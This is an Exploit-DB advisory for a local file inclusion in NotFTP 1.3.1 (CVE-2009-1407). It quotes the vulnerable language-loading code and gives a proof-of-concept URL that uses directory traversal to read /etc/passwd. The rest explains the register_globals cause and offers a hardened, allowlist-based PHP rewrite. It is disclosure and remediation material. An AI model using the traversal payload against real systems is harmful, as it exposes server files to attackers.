- 34,644
- 0
- 18 Dec 2022
- EDB-ID: 8504
- EDB Verified: Passed
- Author: KACPER
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: cve-2009-1407
- Publication date: 2009-04-21
Code:
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
    require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
    require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
    require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
# milw0rm.com [2009-04-21]
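The snippet above builds a require_once path from two bare globals, $newlang and $languages, that the file never defines from trusted input. With PHP's register_globals enabled (removed in PHP 5.4), both can be populated straight from the query string, which is exactly what the PoC does: it supplies its own $languages table with a traversal path in the "file" slot. The fix is to keep the language table as a constant the request cannot replace, read the selection explicitly from $_GET / $_COOKIE, and accept only keys that exist in that table. The following is an added hardened rewrite, not NotFTP's own code; the language entries, file names and the resolve_language_file() helper are assumptions for illustration.

```php
<?php
// Added hardened example (not NotFTP's code). The LANGUAGES entries and the
// lib/lang/ file names below are constructed for illustration.
declare(strict_types=1);

// Defined as a constant in this file, so nothing supplied by the request can
// overwrite it (the original relied on a mutable $languages global).
const LANGUAGES = [
    'en' => ['name' => 'English', 'file' => 'english.php'],
    'pl' => ['name' => 'Polski',  'file' => 'polish.php'],
];
const DEFAULTLANG = 'en';

/**
 * Resolve which language file to load. Only keys present in LANGUAGES are
 * accepted; anything else is ignored and the next candidate is tried, ending
 * with DEFAULTLANG. The request values are passed in explicitly so the
 * function never touches a bare global.
 */
function resolve_language_file(?string $requested, ?string $cookie): string
{
    $candidates = [$requested, $cookie, DEFAULTLANG];
    foreach ($candidates as $key) {
        if ($key !== null && array_key_exists($key, LANGUAGES)) {
            $file = LANGUAGES[$key]['file'];
            // Defence in depth: even a value from our own table must be a
            // plain file name, never a path with directory components.
            if ($file === basename($file)) {
                return __DIR__ . '/lib/lang/' . $file;
            }
        }
    }
    // Only reachable if DEFAULTLANG itself is misconfigured.
    throw new RuntimeException('No usable language file configured');
}

// Read the selection from the superglobals only, and insist on a string:
// a request like ?newlang[]=x would otherwise hand an array to
// array_key_exists(), which is a TypeError on PHP 8.
$requested = (isset($_GET['newlang']) && is_string($_GET['newlang']))
    ? $_GET['newlang'] : null;
$cookie = (isset($_COOKIE['notftplang']) && is_string($_COOKIE['notftplang']))
    ? $_COOKIE['notftplang'] : null;

require_once resolve_language_file($requested, $cookie);
```

With this structure the user-controlled value is only ever used as a lookup key into a fixed table and never becomes part of the path itself, so the ../ sequence in the PoC is simply an unknown key that falls through to the default language. Disabling register_globals (or running a PHP version that no longer has it) removes the root cause; the allowlist keeps the cookie branch safe as well.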
- Source: www.exploit-db.com